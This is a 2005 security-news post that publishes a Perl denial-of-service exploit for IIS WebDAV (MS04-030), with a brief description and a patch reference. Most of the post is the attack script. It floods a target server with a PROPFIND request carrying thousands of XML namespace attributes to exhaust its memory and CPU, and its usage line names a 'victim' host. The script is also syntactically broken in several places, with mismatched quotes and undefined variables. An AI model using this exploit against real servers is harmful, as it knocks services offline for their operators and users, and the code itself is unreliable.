Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | IIS Webdav DOS Exploit |
|---|
Categorie: Vulnerability
Posted: 2005-04-07 by basher13
Views: 700
| Current Rating: Not rated
|
| | Details |
|---|
Update:
8:06 AM 4/7/2005
Subject:
" IIS Webdav DOS Exploit "
Description:
Microsoft Internet Information Server (IIS) v 5.0, 5.1, 6.0 are exists denial
of service vulnerability. the vulnerability exists in the Microsoft XML Parser
component and can be exploited through the WebDAV XML message handler.
Vulnerability:
A denial of service vulnerability exists that could allow an attacker
to send a specially crafted WebDAV request to a server that is running IIS
and WebDAV. An attacker could cause WebDAV to consume all available memory
and CPU time on an affected server. The IIS service would have to be restarted
to restore functionality
Exploit:
#!/usr/bin/perl
# IIS Webdav DOS Exploit
# -------------------------------------
#
# Greats:Amit Klein(has discovered bug)
# info: 98.to/infamous
use IO::Socket;
if (@ARGV < 2)
{
system "clear";
print "\n\n IIS Webdav DOS Exploit\n";
print "---------------------------------\n";
print "INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: iisdav.pl [host] [port] \n";
print "[!]Exam: iisdav.pl www.victim.com 80 \n\n";
exit(1);
}
system "clear";
$server = $ARGV[0];
$port= $ARGV[1];
system "clear";
print "\n[+]Connecting to host:\n\n";
print $server;
$inet = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "$port",
unless ($inet)
{
die "[-]$server connection [FAILED]\n"
}
print "[+]Creating socket [OK]\n");
for ($count=1; $count<9999; $count++)
{
$xmlatt = $xmlatt. "xmlns:z" . $count . "="xml:" ";
}
$0day = "<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" " . $xmlatt . ">
<a:prop><a:getcontenttype/></a:prop>
</a:propfind>";
$l=length($0day);
$req="PROPFIND / HTTP/1.1
Content-type: text/xml
Host: $host
Content-length: $l $0day ";
print "[+]Sent 0day..\n\n";
syswrite($socket,$req,length($req));
print "[+]Found Webdav!\n";
print "[?]SERVER DOS..[OK]";
close($inet);
Solution:
Refer Microsoft Security Bulletin MS04-030, Install KB824151 Hotfix
Vendor URL:
http://www.microsoft.com/technet/security/bulletin/MS04-030.mspx
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1457
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
